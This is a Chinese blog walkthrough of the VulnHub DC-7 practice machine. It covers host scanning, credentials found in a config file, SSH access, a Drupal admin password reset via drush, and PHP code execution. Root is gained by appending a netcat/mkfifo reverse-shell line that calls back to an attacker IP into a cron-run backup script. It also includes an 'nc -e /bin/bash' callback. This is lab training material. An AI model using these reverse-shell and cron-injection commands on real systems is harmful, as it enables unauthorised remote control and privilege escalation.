DC-7--vulnhub靶场

已于 2022-08-05 19:01:07 修改
阅读量935 收藏
点赞数
分类专栏: vulnhub靶场笔记 文章标签: ssh kali linux flag 安全
于 2022-07-30 18:27:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46982383/article/details/126073385
版权
本文介绍了在Vulnhub上的DC-7靶场攻防演练过程,包括主机发现、网站信息收集、利用SSH登录及通过定时任务进行提权的详细步骤。在网站源码中找到的账号密码无法直接登录,但成功通过SSH接入,并发现一个具有提权可能的定时备份任务。最终,通过分析和利用backups.sh脚本,实现了权限提升。
摘要由CSDN通过智能技术生成

靶机:http://www.five86.com/downloads/DC-7.zip
网络模式:NAT

目录

1.主机发现

arp-scan -l

192.168.194.167

nmap -p- -A 192.168.194.167

22/tcp open ssh
80/tcp open http

2.网站信息收集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在下面
在这里插入图片描述
在代码config.php中找到一个账号密码
在这里插入图片描述

$username = “dc7user”;
$password = “MdR3xOgB7#dW”;

在robots.txt中,发现登录界面路径

在这里插入图片描述

在这里插入图片描述
用之前的账号密码登不了,想起还有个22端口的ssh,试试,可以
在这里插入图片描述
查看mbox
虽然很长,但是内容基本重复,可以得到的信息是存在一个定时任务,备份数据库文件,参考
在这里插入图片描述

cat /opt/scripts/backups.sh

在这里插入图片描述
www-data 具有权限,需要获取相应shell,再利用backups.sh提权
在这里插入图片描述

drush 命令可以修改密码

drush user-password admin --password="123456"

在这里插入图片描述

3.登录网站

在这里插入图片描述

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在这里插入图片描述
在这里插入图片描述
折叠查找更快

在这里插入图片描述
在这里插入图片描述
可以写php文件了

在这里插入图片描述

在这里插入图片描述
路径为首页
在这里插入图片描述

4.定时任务提权

nc -e /bin/bash 192.168.194.156 7777

nc -lvvp 7777

利用backups.sh文件提权

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.194.156 6666 >/tmp/f" >> backups.sh

在这里插入图片描述
另一个终端监听
在这里插入图片描述
通过邮件的时间可以得知该脚本每15分钟执行一次

逆风/
关注
专栏目录
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6148
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flagVulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
vulnhub DC-7靶机实战
m0_51195235的博客
11-21 129
vulnhub DC-7靶机实战
vulnhubDC7靶机
LainWith的博客
02-14 1511
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1117
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
VulnHubDC-7
weixin_39219503的博客
02-02 506
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5029
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
Spring Boot视频网站:安全与可扩展性设计
2401_85702623的博客
10-16 581
本次程序开发选用的数据库管理工具是MySQL数据管理工具,使用它存放数据也需要创建程序对应的数据库文件,并命名刚创建的数据库文件,有了数据库也需要创建各种数据表来充实数据库,在数据表的创建中,不仅需要对数据表命名,也需要对数据表的字段进行设计,包括每个数据表里面需要设置的字段名称,字段对应的数据类型信息,字段的主键设置这个也是不可缺少的,因为每个数据表里面的主键就是标记着这个数据表跟其他数据表相区分的唯一标志。addtime timestamp 否 CURRENT_TIMESTAMP 创建时间。
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 272
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
Gin框架操作指南08:日志与安全
技术卷的博客
10-16 453
本节演示日志与安全相关的API,包括定义路由日志的格式;如何记录日志;安全页眉;使用BasicAuth中间件;使用HTTP方法。
【WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2073
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
[漏洞挖掘与防护] 04.Windows系统安全缺陷之5次Shift漏洞启动计算机机理分析
杨秀璋的专栏
10-16 18
上一篇文章详细介绍了WinRAR漏洞(CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。这篇文章将分享Windows系统漏洞,通过5次Shift漏洞重改CMD,最终实现修改计算机密码并启动计算机,其思路还是比较有趣的,希望对您有所帮助!基础性文章,希望对入门的同学有帮助。
自动驾驶系列—自动驾驶系统监控平台:保障无人驾驶安全的幕后英雄
u013889591的专栏
10-16 648
随着自动驾驶技术的发展,车辆不再依赖人类驾驶员操作,而是通过感知、决策和控制系统来实现自动驾驶。这一复杂的技术体系需要高度的实时监控,以确保车辆能够在各种环境中稳定、安全地运行。因此,自动驾驶系统监控平台成为了保障自动驾驶系统安全与稳定运行的关键工具。自动驾驶系统监控平台的作用是实时收集并分析车辆运行过程中各类传感器和系统的状态数据,及时发现异常或潜在风险,提供预警并采取相应的措施,确保整个自动驾驶系统的安全运行。自动驾驶系统监控平台为确保无人驾驶车辆的安全与稳定提供了强有力的支持。
红日安全vulnstack (一)
最新发布
saber的博客
10-16 378
红日靶场从0-1教程,参考大量文章复现而来 有踩过的坑也有真正拿下权限的时候,有失有得这才是渗透嘛
如何给SaaS应用做安全
HoewDec的博客
10-16 386
SaaS(软件即服务)应用在过去几年中得到了迅速发展。截至2023年,全球已有超过30,000家SaaS初创公司。SaaS应用程序已成为无数行业在线业务的重要组成部分和首要选择。凭借着简化的流程,便捷的交付和可扩展性,越来越多的应用数据和业务逻辑已从本地被迁移到了SaaS云端环境中。然而,SaaS应用的增长与普及也自然成为了无数网络威胁与攻击的诱人目标。面对各种安全挑战,SaaS应用供应商和使用方需要通过全方位的安全措施与测试来积极分析与应对。
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值